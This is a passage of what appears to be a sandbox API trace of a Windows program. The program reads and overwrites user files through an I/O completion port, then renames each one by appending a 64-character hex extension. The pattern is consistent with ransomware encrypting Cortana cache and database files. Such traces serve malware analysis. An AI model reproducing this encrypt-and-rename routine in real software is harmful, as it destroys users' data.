hHeap=0x600000) returned 1 [0114.081] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.162] ReadFile (in: hFile=0x310, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0114.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.162] WriteFile (in: hFile=0x310, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0114.163] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.168] WriteFile (in: hFile=0x334, lpBuffer=0x680470, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0114.169] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.169] WriteFile (in: hFile=0x328, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0114.170] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0118.939] WriteFile (in: hFile=0x338, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0118.940] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0118.941] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x26fff70) returned 0x0 [0118.943] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2=".01015ED96AEA31E354925B792600A5409786D83F759D1F4C87D5A65D94686D05" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt.01015ED96AEA31E354925B792600A5409786D83F759D1F4C87D5A65D94686D05") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\1\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt.01015ED96AEA31E354925B792600A5409786D83F759D1F4C87D5A65D94686D05" [0118.943] GetProcessHeap () returned 0x600000 [0118.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x624c78 [0118.943] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x26fff60, FileInformation=0x624c78, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0118.944] CloseHandle (hObject=0x338) returned 1 [0118.945] GetProcessHeap () returned 0x600000 [0118.945] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0118.945] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0118.946] WriteFile (in: hFile=0x318, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0118.947] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.162] ReadFile (in: hFile=0x338, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0119.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.163] WriteFile (in: hFile=0x338, lpBuffer=0x32e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 0x0 [0119.163] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.164] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x26fff70) returned 0x0 [0119.165] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2=".2D717AC327D89BB7DD35E301E8117D1783DF14B4A86D7CB993DC8A86D67C0D24" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt.2D717AC327D89BB7DD35E301E8117D1783DF14B4A86D7CB993DC8A86D67C0D24") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt.2D717AC327D89BB7DD35E301E8117D1783DF14B4A86D7CB993DC8A86D67C0D24" [0119.165] GetProcessHeap () returned 0x600000 [0119.165] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x3184298 [0119.165] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x26fff60, FileInformation=0x3184298, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.166] CloseHandle (hObject=0x338) returned 1 [0119.166] GetProcessHeap () returned 0x600000 [0119.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0119.168] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.173] ReadFile (in: hFile=0x318, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.173] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.174] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x26fff70) returned 0x0 [0119.174] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm", lpString2=".A4D237F10411B39D9F2F863662274EF026817AB47D270731ED327566077A1F06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm.A4D237F10411B39D9F2F863662274EF026817AB47D270731ED327566077A1F06") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm.A4D237F10411B39D9F2F863662274EF026817AB47D270731ED327566077A1F06" [0119.175] GetProcessHeap () returned 0x600000 [0119.175] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ac) returned 0x62d4a0 [0119.175] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x26fff60, FileInformation=0x62d4a0, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0119.177] CloseHandle (hObject=0x318) returned 1 [0119.177] GetProcessHeap () returned 0x600000 [0119.177] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.178] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.222] ReadFile (in: hFile=0x338, lpBuffer=0x30c0180, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0119.223] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.233] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0119.234] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml", lpString2=".DEC62EA8539472CEA17476D4925C1190913FDEC2F3BFB37A65C64FF8C1310C1D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml.DEC62EA8539472CEA17476D4925C1190913FDEC2F3BFB37A65C64FF8C1310C1D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml.DEC62EA8539472CEA17476D4925C1190913FDEC2F3BFB37A65C64FF8C1310C1D" [0119.234] GetProcessHeap () returned 0x600000 [0119.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e8) returned 0x6353b0 [0119.234] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x26fff60, FileInformation=0x6353b0, Length=0x1e8, FileInformationClass=0xa) returned 0x0 [0119.236] CloseHandle (hObject=0x338) returned 1 [0119.236] GetProcessHeap () returned 0x600000 [0119.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0119.238] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.258] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.258] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.260] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0119.260] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log", lpString2=".CA584E71FE1C22EFEE5A4003BECA76793E9FDB74CE7D49DBD772618D1D9FB467" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log.CA584E71FE1C22EFEE5A4003BECA76793E9FDB74CE7D49DBD772618D1D9FB467") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log.CA584E71FE1C22EFEE5A4003BECA76793E9FDB74CE7D49DBD772618D1D9FB467" [0119.260] GetProcessHeap () returned 0x600000 [0119.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6b1350 [0119.260] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x6b1350, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0119.262] CloseHandle (hObject=0x320) returned 1 [0119.262] GetProcessHeap () returned 0x600000 [0119.262] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.262] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.265] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.266] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.266] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.267] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.267] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0119.267] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log", lpString2=".CA0F55E40C46758F1FEF52ADEAB662619550C7431BD7FF58316BE106DD9C7169" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log.CA0F55E40C46758F1FEF52ADEAB662619550C7431BD7FF58316BE106DD9C7169") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log.CA0F55E40C46758F1FEF52ADEAB662619550C7431BD7FF58316BE106DD9C7169" [0119.268] GetProcessHeap () returned 0x600000 [0119.268] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x6d9330 [0119.268] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x6d9330, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0119.269] CloseHandle (hObject=0x320) returned 1 [0119.269] GetProcessHeap () returned 0x600000 [0119.269] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.269] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.272] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.272] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.273] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0119.273] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log", lpString2=".6FB2633E2A8BF3BABF63DC9DA0C547C6FAAFBB6E216F6E532F5EC9652230C12F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log.6FB2633E2A8BF3BABF63DC9DA0C547C6FAAFBB6E216F6E532F5EC9652230C12F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log.6FB2633E2A8BF3BABF63DC9DA0C547C6FAAFBB6E216F6E532F5EC9652230C12F" [0119.273] GetProcessHeap () returned 0x600000 [0119.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x6d94e0 [0119.274] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x6d94e0, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0119.274] CloseHandle (hObject=0x320) returned 1 [0119.275] GetProcessHeap () returned 0x600000 [0119.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.276] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.281] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.281] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.281] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.282] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.283] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0119.283] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log", lpString2=".5D334DE0DFECD838624639BA8DB0D335DFAB87A3DE919C0E7307767DDE7A507B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log.5D334DE0DFECD838624639BA8DB0D335DFAB87A3DE919C0E7307767DDE7A507B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log.5D334DE0DFECD838624639BA8DB0D335DFAB87A3DE919C0E7307767DDE7A507B" [0119.283] GetProcessHeap () returned 0x600000 [0119.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x62c6e0 [0119.283] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x62c6e0, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0119.284] CloseHandle (hObject=0x320) returned 1 [0119.284] GetProcessHeap () returned 0x600000 [0119.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.284] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.287] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.287] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.288] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0119.288] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.309] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.316] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.317] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.326] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.327] GetQueuedCompletionStatus 